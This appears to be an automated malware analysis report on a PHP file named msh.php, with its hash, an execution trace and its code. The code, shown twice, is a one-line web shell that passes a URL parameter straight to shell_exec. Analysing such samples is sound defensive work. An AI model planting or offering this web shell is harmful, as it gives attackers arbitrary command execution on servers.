PHP Malware Analysis

msh.php

md5: 0fe4434347dc73f0b2d29f84b686e22f

Jump to:

Screenshot


Attributes

Execution

Input


Deobfuscated PHP code

<?php

shell_exec($_GET["cmd"]);

Execution traces

data/traces/0fe4434347dc73f0b2d29f84b686e22f_trace-1676246345.0771.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:59:30.974884]
1	0	1	0.000152	393512
1	3	0	0.000195	393904	{main}	1		/var/www/html/uploads/msh.php	0	0
2	4	0	0.000228	393904	shell_exec	0		/var/www/html/uploads/msh.php	2	1	NULL
2	4	1	0.000252	393936
2	4	R			FALSE
1	3	1	0.000267	393904
			0.000290	314224
TRACE END   [2023-02-12 21:59:30.975054]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
shell_exec($_GET["cmd"]);